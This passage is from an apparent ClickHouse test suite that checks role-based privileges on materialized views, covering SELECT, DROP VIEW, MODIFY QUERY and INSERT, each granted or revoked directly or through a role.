f"SELECT * FROM {table_name}", settings=[("user", f"{user_name}")]
)
finally:
with Finally("I drop the view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
@Requirements(RQ_SRS_006_RBAC_MaterializedView_Select_SourceTable("1.0"))
def select_from_source_table_privilege_granted_directly_or_via_role(self, node=None):
"""Check that user is able to SELECT from the source table of a materialized view
if they have SELECT privilege on that table.
"""
user_name = f"user_{getuid()}"
role_name = f"role_{getuid()}"
if node is None:
node = self.context.node
with user(node, f"{user_name}"):
Scenario(
test=select_from_source_table,
name="select from source table, privilege granted directly",
)(grant_target_name=user_name, user_name=user_name)
with user(node, f"{user_name}"), role(node, f"{role_name}"):
with When("I grant the role to the user"):
node.query(f"GRANT {role_name} TO {user_name}")
Scenario(
test=select_from_source_table,
name="select from source table, privilege granted through a role",
)(grant_target_name=role_name, user_name=user_name)
@TestOutline
def select_from_source_table(self, grant_target_name, user_name, node=None):
"""Grant SELECT on the source table and check the user is able to SELECT only if they have SELECT privilege on the table."""
view_name = f"view_{getuid()}"
table_name = f"table_{getuid()}"
exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
if node is None:
node = self.context.node
with table(node, f"{table_name}"):
try:
with Given("I have a view"):
node.query(
f"CREATE MATERIALIZED VIEW {view_name} ENGINE = Memory AS SELECT * FROM {table_name}"
)
with Then("I attempt to SELECT from the source table as the user"):
node.query(
f"SELECT * FROM {table_name}",
settings=[("user", f"{user_name}")],
exitcode=exitcode,
message=message,
)
with When("I grant SELECT privilege on the view"):
node.query(f"GRANT SELECT ON {view_name} TO {grant_target_name}")
with Then("I attempt to SELECT from the implicit target table as the user"):
node.query(
f"SELECT * FROM {table_name}",
settings=[("user", f"{user_name}")],
exitcode=exitcode,
message=message,
)
with When("I grant SELECT privilege on the target table"):
node.query(f"GRANT SELECT ON {table_name} TO {grant_target_name}")
with Then("I attempt to SELECT from the implicit target table as the user"):
node.query(
f"SELECT * FROM {table_name}", settings=[("user", f"{user_name}")]
)
finally:
with Finally("I drop the view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestSuite
@Requirements(
RQ_SRS_006_RBAC_MaterializedView_Drop("1.0"),
)
def drop(self, node=None):
"""Test the RBAC functionality of the `DROP VIEW` command."""
Scenario(
run=drop_with_privilege_granted_directly_or_via_role,
setup=instrument_clickhouse_server_log,
)
Scenario(
run=drop_with_revoked_privilege_revoked_directly_or_from_role,
setup=instrument_clickhouse_server_log,
)
@TestScenario
def drop_with_privilege_granted_directly_or_via_role(self, node=None):
"""Check that user is able to drop view with DROP VIEW privilege if the user has privilege directly or through a role."""
user_name = f"user_{getuid()}"
role_name = f"role_{getuid()}"
if node is None:
node = self.context.node
with user(node, f"{user_name}"):
Scenario(test=drop_with_privilege, name="drop privilege granted directly")(
grant_target_name=user_name, user_name=user_name
)
with user(node, f"{user_name}"), role(node, f"{role_name}"):
with When("I grant the role to the user"):
node.query(f"GRANT {role_name} TO {user_name}")
Scenario(
test=drop_with_privilege, name="drop privilege granted through a role"
)(grant_target_name=role_name, user_name=user_name)
@TestOutline
def drop_with_privilege(self, grant_target_name, user_name, node=None):
"""Grant DROP VIEW privilege and check the user is able to successfully drop a view."""
view_name = f"view_{getuid()}"
exitcode, message = errors.table_does_not_exist(name=f"default.{view_name}")
if node is None:
node = self.context.node
try:
with Given("I have a view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
node.query(
f"CREATE MATERIALIZED VIEW {view_name} ENGINE = Memory AS SELECT 1"
)
with When("I grant DROP VIEW privilege"):
node.query(f"GRANT DROP VIEW ON {view_name} TO {grant_target_name}")
with And("I drop the view as the user"):
node.query(f"DROP VIEW {view_name}", settings=[("user", f"{user_name}")])
with Then("I check the table does not exist"):
node.query(f"SELECT * FROM {view_name}", exitcode=exitcode, message=message)
finally:
with Finally("I drop the view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
def drop_with_revoked_privilege_revoked_directly_or_from_role(self, node=None):
"""Check that user is unable to drop view with DROP VIEW privilege revoked directly or from a role."""
user_name = f"user_{getuid()}"
role_name = f"role_{getuid()}"
if node is None:
node = self.context.node
with user(node, f"{user_name}"):
Scenario(
test=drop_with_revoked_privilege, name="drop privilege revoked directly"
)(grant_target_name=user_name, user_name=user_name)
with user(node, f"{user_name}"), role(node, f"{role_name}"):
with When("I grant the role to the user"):
node.query(f"GRANT {role_name} TO {user_name}")
Scenario(
test=drop_with_revoked_privilege, name="drop privilege revoked from a role"
)(grant_target_name=role_name, user_name=user_name)
@TestOutline
def drop_with_revoked_privilege(self, grant_target_name, user_name, node=None):
"""Revoke DROP VIEW privilege and check the user is unable to DROP a view."""
view_name = f"view_{getuid()}"
exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
if node is None:
node = self.context.node
try:
with Given("I have a view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
node.query(
f"CREATE MATERIALIZED VIEW {view_name} ENGINE = Memory AS SELECT 1"
)
with When("I grant DROP VIEW privilege"):
node.query(f"GRANT DROP VIEW ON {view_name} TO {grant_target_name}")
with And("I revoke DROP VIEW privilege"):
node.query(f"REVOKE DROP VIEW ON {view_name} FROM {grant_target_name}")
with Then("I drop the view as the user"):
node.query(
f"DROP VIEW {view_name}",
settings=[("user", f"{user_name}")],
exitcode=exitcode,
message=message,
)
finally:
with Finally("I drop the view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestSuite
@Requirements(
RQ_SRS_006_RBAC_MaterializedView_ModifyQuery("1.0"),
)
def modify_query(self, node=None):
"""Test the RBAC functionality of the `MODIFY QUERY` command."""
if node is None:
node = self.context.node
with allow_experimental_alter_materialized_view_structure(node):
Scenario(
run=modify_query_with_privilege_granted_directly_or_via_role,
setup=instrument_clickhouse_server_log,
)
Scenario(
run=modify_query_with_privilege_revoked_directly_or_from_role,
setup=instrument_clickhouse_server_log,
)
Scenario(
run=modify_query_without_source_table_privilege,
setup=instrument_clickhouse_server_log,
)
Scenario(
run=modify_query_with_source_table_privilege_granted_directly_or_via_role,
setup=instrument_clickhouse_server_log,
)
Scenario(
run=modify_query_with_subquery_privilege_granted_directly_or_via_role,
setup=instrument_clickhouse_server_log,
)
Scenario(
run=modify_query_with_join_query_privilege_granted_directly_or_via_role,
setup=instrument_clickhouse_server_log,
)
Scenario(
run=modify_query_with_union_query_privilege_granted_directly_or_via_role,
setup=instrument_clickhouse_server_log,
)
Scenario(
run=modify_query_with_join_union_subquery_privilege_granted_directly_or_via_role,
setup=instrument_clickhouse_server_log,
)
Scenario(
run=modify_query_with_nested_views_privilege_granted_directly_or_via_role,
setup=instrument_clickhouse_server_log,
)
@TestScenario
def modify_query_with_privilege_granted_directly_or_via_role(self, node=None):
"""Check that user is able to modify view with MODIFY QUERY if the user has privilege directly or through a role."""
user_name = f"user_{getuid()}"
role_name = f"role_{getuid()}"
if node is None:
node = self.context.node
with user(node, f"{user_name}"):
Scenario(
test=modify_query_with_privilege,
name="modify query privilege granted directly",
)(grant_target_name=user_name, user_name=user_name)
with user(node, f"{user_name}"), role(node, f"{role_name}"):
with When("I grant the role to the user"):
node.query(f"GRANT {role_name} TO {user_name}")
Scenario(
test=modify_query_with_privilege,
name="modify query privilege granted through a role",
)(grant_target_name=role_name, user_name=user_name)
@TestScenario
def modify_query_with_privilege(self, grant_target_name, user_name, node=None):
"""Grant MODIFY QUERY and check that user is able to execute it."""
view_name = f"view_{getuid()}"
if node is None:
node = self.context.node
try:
with Given("I have a view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
node.query(
f"CREATE MATERIALIZED VIEW {view_name} ENGINE = Memory AS SELECT 1"
)
with When("I grant MODIFY QUERY privilege"):
node.query(
f"GRANT ALTER VIEW MODIFY QUERY ON {view_name} TO {grant_target_name}"
)
with Then("I modify the view query as the user"):
node.query(
f"ALTER TABLE {view_name} MODIFY QUERY SELECT 2",
settings=[("user", f"{user_name}")],
)
finally:
with Finally("I drop the view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
def modify_query_with_privilege_revoked_directly_or_from_role(self, node=None):
"""Check that user is unable to modify the view query with MODIFY QUERY if the privilege has been revoked, directly or from a role."""
user_name = f"user_{getuid()}"
role_name = f"role_{getuid()}"
if node is None:
node = self.context.node
with user(node, f"{user_name}"):
Scenario(
test=modify_query_with_revoked_privilege,
name="modify query privilege revoked directly",
)(grant_target_name=user_name, user_name=user_name)
with user(node, f"{user_name}"), role(node, f"{role_name}"):
with When("I grant the role to the user"):
node.query(f"GRANT {role_name} TO {user_name}")
Scenario(
test=modify_query_with_revoked_privilege,
name="modify query privilege revoked from a role",
)(grant_target_name=role_name, user_name=user_name)
@TestScenario
def modify_query_with_revoked_privilege(self, grant_target_name, user_name, node=None):
"""Revoke MODIFY QUERY and check that user is unable to modify the view query."""
view_name = f"view_{getuid()}"
exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
if node is None:
node = self.context.node
try:
with Given("I have a view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
node.query(
f"CREATE MATERIALIZED VIEW {view_name} ENGINE = Memory AS SELECT 1"
)
with When("I grant MODIFY QUERY privilege"):
node.query(
f"GRANT ALTER VIEW MODIFY QUERY ON {view_name} TO {grant_target_name}"
)
with And("I revoke MODIFY QUERY privilege"):
node.query(
f"REVOKE ALTER VIEW MODIFY QUERY ON {view_name} FROM {grant_target_name}"
)
with Then("I modify the view query as the user"):
node.query(
f"ALTER TABLE {view_name} MODIFY QUERY SELECT 2",
settings=[("user", f"{user_name}")],
exitcode=exitcode,
message=message,
)
finally:
with Finally("I drop the view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
def modify_query_without_source_table_privilege(self, node=None):
"""Check that user is unable to modify the view query to have a source table in the stored query
without SELECT privilege for the new source table.
"""
user_name = f"user_{getuid()}"
view_name = f"view_{getuid()}"
table_name = f"table_{getuid()}"
exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
if node is None:
node = self.context.node
with table(node, f"{table_name}"):
with user(node, f"{user_name}"):
try:
with When("I create a view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
node.query(
f"CREATE MATERIALIZED VIEW {view_name} ENGINE = Memory AS SELECT 1"
)
with And("I grant view MODIFY QUERY privilege to the user"):
node.query(
f"GRANT ALTER VIEW MODIFY QUERY ON {view_name} TO {user_name}"
)
with Then(
"I attempt to use MODIFY QUERY on the view without privilege on the source table"
):
node.query(
f"ALTER TABLE {view_name} MODIFY QUERY SELECT * FROM {table_name}",
settings=[("user", f"{user_name}")],
exitcode=exitcode,
message=message,
)
finally:
with Finally("I drop the view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
def modify_query_with_source_table_privilege_granted_directly_or_via_role(
self, node=None
):
"""Check that user is able to modify the view query to have a source table in the stored query, if and only if
the user has SELECT privilege for the view and the source table, either directly or from a role.
"""
user_name = f"user_{getuid()}"
role_name = f"role_{getuid()}"
if node is None:
node = self.context.node
with user(node, f"{user_name}"):
Scenario(
test=modify_query_with_source_table_privilege,
name="modify query with source table, privilege granted directly",
)(grant_target_name=user_name, user_name=user_name)
with user(node, f"{user_name}"), role(node, f"{role_name}"):
with When("I grant the role to the user"):
node.query(f"GRANT {role_name} TO {user_name}")
Scenario(
test=modify_query_with_source_table_privilege,
name="modify query with source table, privilege granted through a role",
)(grant_target_name=role_name, user_name=user_name)
@TestOutline
def modify_query_with_source_table_privilege(
self, user_name, grant_target_name, node=None
):
"""Grant MODIFY QUERY privilege on view and SELECT privilege on the new source table and check the user is able to modify the view query."""
view_name = f"view_{getuid()}"
table_name = f"table_{getuid()}"
if node is None:
node = self.context.node
with table(node, f"{table_name}"):
try:
with Given("I have a view with a source table"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
node.query(
f"CREATE MATERIALIZED VIEW {view_name} ENGINE = Memory AS SELECT 1"
)
with And("I grant view MODIFY QUERY privilege"):
node.query(
f"GRANT ALTER VIEW MODIFY QUERY ON {view_name} TO {grant_target_name}"
)
with And("I grant table SELECT privilege"):
node.query(f"GRANT SELECT ON {table_name} TO {grant_target_name}")
with Then("I check the user is able to modify the view query"):
node.query(
f"ALTER TABLE {view_name} MODIFY QUERY SELECT * FROM {table_name}",
settings=[("user", f"{user_name}")],
)
finally:
with Finally("I drop the view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
def modify_query_with_subquery_privilege_granted_directly_or_via_role(self, node=None):
"""Check that user is able to modify the view query to use a query with two subqueries if and only if
the user has MODIFY QUERY privilege for that view and SELECT for all the tables, either directly or through a role.
"""
user_name = f"user_{getuid()}"
role_name = f"role_{getuid()}"
if node is None:
node = self.context.node
with user(node, f"{user_name}"):
Scenario(
test=modify_query_with_subquery,
name="modify query with subquery, privilege granted directly",
)(grant_target_name=user_name, user_name=user_name)
with user(node, f"{user_name}"), role(node, f"{role_name}"):
with When("I grant the role to the user"):
node.query(f"GRANT {role_name} TO {user_name}")
Scenario(
test=modify_query_with_subquery,
name="modify query with subquery, privilege granted through a role",
)(grant_target_name=role_name, user_name=user_name)
@TestOutline
def modify_query_with_subquery(self, user_name, grant_target_name, node=None):
"""Grant MODIFY QUERY on the view and SELECT on tables included in the MODIFY QUERY statement and check the user is able to modify the view query
if and only if they have SELECT privilege on all of the tables.
"""
view_name = f"view_{getuid()}"
table0_name = f"table0_{getuid()}"
table1_name = f"table1_{getuid()}"
table2_name = f"table2_{getuid()}"
exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
modify_query_view_query = "ALTER TABLE {view_name} MODIFY QUERY SELECT * FROM {table0_name} WHERE y IN (SELECT y FROM {table1_name} WHERE y IN (SELECT y FROM {table2_name} WHERE y<2))"
if node is None:
node = self.context.node
with table(node, f"{table0_name},{table1_name},{table2_name}"):
try:
with Given("I have a view with a subquery"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
node.query(
f"CREATE MATERIALIZED VIEW {view_name} ENGINE = Memory AS SELECT 1"
)
with When("I grant MODIFY QUERY privilege on view"):
node.query(
f"GRANT ALTER VIEW MODIFY QUERY ON {view_name} TO {grant_target_name}"
)
with Then("I attempt to modify the view query as the user"):
node.query(
modify_query_view_query.format(
view_name=view_name,
table0_name=table0_name,
table1_name=table1_name,
table2_name=table2_name,
),
settings=[("user", f"{user_name}")],
exitcode=exitcode,
message=message,
)
for permutation in permutations(table_count=3):
with grant_select_on_table(
node,
permutation,
grant_target_name,
table0_name,
table1_name,
table2_name,
) as tables_granted:
with When(
f"permutation={permutation}, tables granted = {tables_granted}"
):
with Then("I attempt to modify the view query as the user"):
node.query(
modify_query_view_query.format(
view_name=view_name,
table0_name=table0_name,
table1_name=table1_name,
table2_name=table2_name,
),
settings=[("user", f"{user_name}")],
exitcode=exitcode,
message=message,
)
with When("I grant select on all tables"):
with grant_select_on_table(
node,
max(permutations(table_count=3)) + 1,
grant_target_name,
table0_name,
table1_name,
table2_name,
):
with Then("I attempt to modify the view query as the user"):
output = node.query(
modify_query_view_query.format(
view_name=view_name,
table0_name=table0_name,
table1_name=table1_name,
table2_name=table2_name,
),
settings=[("user", f"{user_name}")],
).output
assert output == "0", error()
finally:
with Finally("I drop the view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
def modify_query_with_join_query_privilege_granted_directly_or_via_role(
self, node=None
):
"""Check that user is able to modify the view query to use a query that includes a `JOIN` statement if and only if
the user has SELECT privilege on all the tables and MODIFY QUERY privilege on the view, either directly or through a role.
"""
user_name = f"user_{getuid()}"
role_name = f"role_{getuid()}"
if node is None:
node = self.context.node
with user(node, f"{user_name}"):
Scenario(
test=modify_query_with_join_query,
name="modify query with join, privilege granted directly",
)(grant_target_name=user_name, user_name=user_name)
with user(node, f"{user_name}"), role(node, f"{role_name}"):
with When("I grant the role to the user"):
node.query(f"GRANT {role_name} TO {user_name}")
Scenario(
test=modify_query_with_join_query,
name="modify query with join, privilege granted through a role",
)(grant_target_name=role_name, user_name=user_name)
@TestOutline
def modify_query_with_join_query(self, user_name, grant_target_name, node=None):
"""Grant MODIFY QUERY on the view and SELECT on the tables in the modified query and check the user is able to modify the view query to
use a `JOIN` statement if and only if they have SELECT privilege on all of them.
"""
view_name = f"view_{getuid()}"
table0_name = f"table0_{getuid()}"
table1_name = f"table1_{getuid()}"
exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
modify_query_view_query = "ALTER TABLE {view_name} MODIFY QUERY SELECT * FROM {table0_name} JOIN {table1_name} USING d"
if node is None:
node = self.context.node
with table(node, f"{table0_name},{table1_name}"):
try:
with Given("I have a view with a JOIN statement"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
node.query(
f"CREATE MATERIALIZED VIEW {view_name} ENGINE = Memory AS SELECT 1"
)
with When("I grant MODIFY QUERY privilege on view"):
node.query(
f"GRANT ALTER VIEW MODIFY QUERY ON {view_name} TO {grant_target_name}"
)
with Then("I attempt to modify the view query as the user"):
node.query(
modify_query_view_query.format(
view_name=view_name,
table0_name=table0_name,
table1_name=table1_name,
),
settings=[("user", f"{user_name}")],
exitcode=exitcode,
message=message,
)
for permutation in permutations(table_count=2):
with grant_select_on_table(
node, permutation, grant_target_name, table0_name, table1_name
) as tables_granted:
with When(
f"permutation={permutation}, tables granted = {tables_granted}"
):
with Then("I attempt to modify the view query as the user"):
node.query(
modify_query_view_query.format(
view_name=view_name,
table0_name=table0_name,
table1_name=table1_name,
),
settings=[("user", f"{user_name}")],
exitcode=exitcode,
message=message,
)
with When("I grant select on all tables"):
with grant_select_on_table(
node,
max(permutations(table_count=2)) + 1,
grant_target_name,
table0_name,
table1_name,
):
with Then("I attempt to modify the view query as the user"):
node.query(
modify_query_view_query.format(
view_name=view_name,
table0_name=table0_name,
table1_name=table1_name,
),
settings=[("user", f"{user_name}")],
)
finally:
with Finally("I drop the view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
def modify_query_with_union_query_privilege_granted_directly_or_via_role(
self, node=None
):
"""Check that user is able to modify the view query to include a `UNION ALL` statement if and only if
the user has SELECT privilege on all the tables and MODIFY QUERY on the view, either directly or through a role.
"""
user_name = f"user_{getuid()}"
role_name = f"role_{getuid()}"
if node is None:
node = self.context.node
with user(node, f"{user_name}"):
Scenario(
test=modify_query_with_union_query,
name="modify query with union, privilege granted directly",
)(grant_target_name=user_name, user_name=user_name)
with user(node, f"{user_name}"), role(node, f"{role_name}"):
with When("I grant the role to the user"):
node.query(f"GRANT {role_name} TO {user_name}")
Scenario(
test=modify_query_with_union_query,
name="modify query with union, privilege granted through a role",
)(grant_target_name=role_name, user_name=user_name)
@TestOutline
def modify_query_with_union_query(self, user_name, grant_target_name, node=None):
"""Grant MODIFY QUERY on the view and SELECT on the tables in the stored query and check the user is able modify the view query if and only if they have SELECT privilege on all of them."""
view_name = f"view_{getuid()}"
table0_name = f"table0_{getuid()}"
table1_name = f"table1_{getuid()}"
exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
modify_query_view_query = "ALTER TABLE {view_name} MODIFY QUERY SELECT * FROM {table0_name} UNION ALL SELECT * FROM {table1_name}"
if node is None:
node = self.context.node
with table(node, f"{table0_name},{table1_name}"):
try:
with Given("I have a view with a UNION statement"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
node.query(
f"CREATE MATERIALIZED VIEW {view_name} ENGINE = Memory AS SELECT 1"
)
with When("I grant MODIFY QUERY privilege on view"):
node.query(
f"GRANT ALTER VIEW MODIFY QUERY ON {view_name} TO {grant_target_name}"
)
with Then("I attempt to modify the view query as the user"):
node.query(
modify_query_view_query.format(
view_name=view_name,
table0_name=table0_name,
table1_name=table1_name,
),
settings=[("user", f"{user_name}")],
exitcode=exitcode,
message=message,
)
for permutation in permutations(table_count=2):
with grant_select_on_table(
node, permutation, grant_target_name, table0_name, table1_name
) as tables_granted:
with When(
f"permutation={permutation}, tables granted = {tables_granted}"
):
with Then("I attempt to modify the view query as the user"):
node.query(
modify_query_view_query.format(
view_name=view_name,
table0_name=table0_name,
table1_name=table1_name,
),
settings=[("user", f"{user_name}")],
exitcode=exitcode,
message=message,
)
with When("I grant select on all tables"):
with grant_select_on_table(
node,
max(permutations(table_count=2)) + 1,
grant_target_name,
table0_name,
table1_name,
):
with Then("I attempt to modify the view query as the user"):
node.query(
modify_query_view_query.format(
view_name=view_name,
table0_name=table0_name,
table1_name=table1_name,
),
settings=[("user", f"{user_name}")],
)
finally:
with Finally("I drop the view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
def modify_query_with_join_union_subquery_privilege_granted_directly_or_via_role(
self, node=None
):
"""Check that user is able to modify the view query to include `UNION ALL`, `JOIN` and two subqueries
if and only if the user has SELECT privilege on all the tables and the view, either directly or through a role.
"""
user_name = f"user_{getuid()}"
role_name = f"role_{getuid()}"
if node is None:
node = self.context.node
with user(node, f"{user_name}"):
Scenario(
test=modify_query_with_join_union_subquery,
name="modify query with join union subquery, privilege granted directly",
)(grant_target_name=user_name, user_name=user_name)
with user(node, f"{user_name}"), role(node, f"{role_name}"):
with When("I grant the role to the user"):
node.query(f"GRANT {role_name} TO {user_name}")
Scenario(
test=modify_query_with_join_union_subquery,
name="modify query with join union subquery, privilege granted through a role",
)(grant_target_name=role_name, user_name=user_name)
@TestOutline
def modify_query_with_join_union_subquery(
self, grant_target_name, user_name, node=None
):
"""Grant MODIFY QUERY on the view and SELECT on tables in the modify query and check the user is able modify the view query
if and only if they have SELECT privilege on all of them.
"""
view_name = f"view_{getuid()}"
table0_name = f"table0_{getuid()}"
table1_name = f"table1_{getuid()}"
table2_name = f"table2_{getuid()}"
table3_name = f"table3_{getuid()}"
table4_name = f"table4_{getuid()}"
exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
modify_query_view_query = "ALTER TABLE {view_name} MODIFY QUERY SELECT y FROM {table0_name} JOIN {table1_name} USING y UNION ALL SELECT y FROM {table1_name} WHERE y IN (SELECT y FROM {table3_name} WHERE y IN (SELECT y FROM {table4_name} WHERE y<2))"
if node is None:
node = self.context.node
with table(
node, f"{table0_name},{table1_name},{table2_name},{table3_name},{table4_name}"
):
try:
with Given("I have a view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
node.query(
f"CREATE MATERIALIZED VIEW {view_name} ENGINE = Memory AS SELECT 1"
)
with When("I grant MODIFY QUERY privilege on view"):
node.query(
f"GRANT ALTER VIEW MODIFY QUERY ON {view_name} TO {grant_target_name}"
)
with Then("I attempt to modify the view query as the user"):
node.query(
modify_query_view_query.format(
view_name=view_name,
table0_name=table0_name,
table1_name=table1_name,
table2_name=table2_name,
table3_name=table3_name,
table4_name=table4_name,
),
settings=[("user", f"{user_name}")],
exitcode=exitcode,
message=message,
)
for permutation in permutations(table_count=5):
with grant_select_on_table(
node,
permutation,
grant_target_name,
table0_name,
table1_name,
table2_name,
table3_name,
table4_name,
) as tables_granted:
with When(
f"permutation={permutation}, tables granted = {tables_granted}"
):
with Then("I attempt to modify the view query as the user"):
node.query(
modify_query_view_query.format(
view_name=view_name,
table0_name=table0_name,
table1_name=table1_name,
table2_name=table2_name,
table3_name=table3_name,
table4_name=table4_name,
),
settings=[("user", f"{user_name}")],
exitcode=exitcode,
message=message,
)
with When("I grant select on all tables"):
with grant_select_on_table(
node,
max(permutations(table_count=5)) + 1,
grant_target_name,
table0_name,
table1_name,
table2_name,
table3_name,
table4_name,
):
with Then("I attempt to modify the view query as the user"):
node.query(
modify_query_view_query.format(
view_name=view_name,
table0_name=table0_name,
table1_name=table1_name,
table2_name=table2_name,
table3_name=table3_name,
table4_name=table4_name,
),
settings=[("user", f"{user_name}")],
)
finally:
with Finally("I drop the view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
def modify_query_with_nested_views_privilege_granted_directly_or_via_role(
self, node=None
):
"""Check that user is able to modify the view query to include other views if and only if
the user has MODIFY QUERY privilege on the view SELECT privilege on all of the views and the source tables for those views, either directly or through a role.
"""
user_name = f"user_{getuid()}"
role_name = f"role_{getuid()}"
if node is None:
node = self.context.node
with user(node, f"{user_name}"):
Scenario(
test=modify_query_with_nested_views,
name="modify query with nested views, privilege granted directly",
)(grant_target_name=user_name, user_name=user_name)
with user(node, f"{user_name}"), role(node, f"{role_name}"):
with When("I grant the role to the user"):
node.query(f"GRANT {role_name} TO {user_name}")
Scenario(
test=modify_query_with_nested_views,
name="modify query with nested views, privilege granted through a role",
)(grant_target_name=role_name, user_name=user_name)
@TestOutline
def modify_query_with_nested_views(self, grant_target_name, user_name, node=None):
"""Grant MODIFY QUERY on view and SELECT on the tables and views in the modified query and check the user is able to modify the view query
if and only if they have SELECT privilege on all of them.
"""
view0_name = f"view0_{getuid()}"
view1_name = f"view1_{getuid()}"
view2_name = f"view2_{getuid()}"
view3_name = f"view3_{getuid()}"
table0_name = f"table0_{getuid()}"
table1_name = f"table1_{getuid()}"
table2_name = f"table2_{getuid()}"
table3_name = f"table3_{getuid()}"
exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
modify_query_view_query = "ALTER TABLE {view3_name} MODIFY QUERY SELECT y FROM {view2_name} UNION ALL SELECT y FROM {table3_name}"
if node is None:
node = self.context.node
with table(node, f"{table0_name},{table1_name},{table2_name},{table3_name}"):
try:
with Given("I have some views"):
node.query(f"CREATE VIEW {view0_name} AS SELECT y FROM {table0_name}")
node.query(
f"CREATE VIEW {view1_name} AS SELECT y FROM {view0_name} WHERE y IN (SELECT y FROM {table1_name} WHERE y<2)"
)
node.query(
f"CREATE VIEW {view2_name} AS SELECT y FROM {view1_name} JOIN {table2_name} USING y"
)
node.query(f"CREATE VIEW {view3_name} AS SELECT 1")
with When("I grant MODIFY QUERY privilege on view"):
node.query(
f"GRANT ALTER VIEW MODIFY QUERY ON {view3_name} TO {grant_target_name}"
)
with Then("I attempt to modify the view query as the user"):
node.query(
modify_query_view_query.format(
view3_name=view3_name,
view2_name=view2_name,
table3_name=table3_name,
),
settings=[("user", f"{user_name}")],
exitcode=exitcode,
message=message,
)
for permutation in (
[0, 1, 2, 3, 7, 11, 15, 31, 39, 79, 95],
permutations(table_count=7),
)[self.context.stress]:
with grant_select_on_table(
node,
permutation,
grant_target_name,
view2_name,
table3_name,
view1_name,
table2_name,
view0_name,
table1_name,
table0_name,
) as tables_granted:
with When(
f"permutation={permutation}, tables granted = {tables_granted}"
):
with Then("I attempt to modify the view query as the user"):
node.query(
modify_query_view_query.format(
view3_name=view3_name,
view2_name=view2_name,
table3_name=table3_name,
),
settings=[("user", f"{user_name}")],
exitcode=exitcode,
message=message,
)
with When("I grant select on all views"):
with grant_select_on_table(
node,
max(permutations(table_count=7)) + 1,
grant_target_name,
view0_name,
view1_name,
view2_name,
table0_name,
table1_name,
table2_name,
table3_name,
):
with Then("I attempt to modify the view query as the user"):
node.query(
modify_query_view_query.format(
view3_name=view3_name,
view2_name=view2_name,
table3_name=table3_name,
),
settings=[("user", f"{user_name}")],
)
finally:
with Finally("I drop the views"):
with When("I drop view0", flags=TE):
node.query(f"DROP VIEW IF EXISTS {view3_name}")
with And("I drop view1", flags=TE):
node.query(f"DROP VIEW IF EXISTS {view2_name}")
with And("I drop view2", flags=TE):
node.query(f"DROP VIEW IF EXISTS {view1_name}")
with And("I drop view3", flags=TE):
node.query(f"DROP VIEW IF EXISTS {view0_name}")
@TestSuite
def insert(self, node=None):
"""Check RBAC functionality of INSERT with materialized views."""
Scenario(
run=insert_on_source_table_privilege_granted_directly_or_via_role,
setup=instrument_clickhouse_server_log,
)
Scenario(
run=insert_with_privilege_granted_directly_or_via_role,
setup=instrument_clickhouse_server_log,
)
Scenario(
run=insert_on_target_table_privilege_granted_directly_or_via_role,
setup=instrument_clickhouse_server_log,
)
@TestScenario
@Requirements(
RQ_SRS_006_RBAC_MaterializedView_Insert_SourceTable("1.0"),
)
def insert_on_source_table_privilege_granted_directly_or_via_role(self, node=None):
"""Check that user is able to INSERT on the source table of the materialized view with only INSERT privilege on the source table."""
user_name = f"user_{getuid()}"
role_name = f"role_{getuid()}"
if node is None:
node = self.context.node
with user(node, f"{user_name}"):
Scenario(
test=insert_on_source_table,
name="insert on source table, privilege granted directly",
)(grant_target_name=user_name, user_name=user_name)
with user(node, f"{user_name}"), role(node, f"{role_name}"):
with When("I grant the role to the user"):
node.query(f"GRANT {role_name} TO {user_name}")
Scenario(
test=insert_on_source_table,
name="insert on source table, privilege granted through a role",
)(grant_target_name=role_name, user_name=user_name)
@TestOutline
def insert_on_source_table(self, grant_target_name, user_name, node=None):
"""Grant SELECT on the source table to the user and check they are able to SELECT from it."""
view_name = f"view_{getuid()}"
table0_name = f"table0_{getuid()}"
table1_name = f"table1_{getuid()}"
if node is None:
node = self.context.node
with table(node, f"{table0_name},{table1_name}"):
try:
with Given("I have a view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
node.query(
f"CREATE MATERIALIZED VIEW {view_name} TO {table0_name} AS SELECT * FROM {table1_name}"
)
with When("I grant INSERT on the source table"):
node.query(f"GRANT INSERT ON {table1_name} TO {grant_target_name}")
with Then("I attempt to insert into the source table"):
node.query(
f"INSERT INTO {table1_name}(d) VALUES ('2020-01-01')",
settings=[("user", f"{user_name}")],
)
finally:
with Finally("I drop the view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
@Requirements(
RQ_SRS_006_RBAC_MaterializedView_Insert("1.0"),
)
def insert_with_privilege_granted_directly_or_via_role(self, node=None):
"""Check that user is able to INSERT into materialized view if and only if they have INSERT privilege for the view,
either directly or through a role.
"""
user_name = f"user_{getuid()}"
role_name = f"role_{getuid()}"
if node is None:
node = self.context.node
with user(node, f"{user_name}"):
Scenario(
test=insert_with_insert_privilege,
name="insert on view, privilege granted directly",
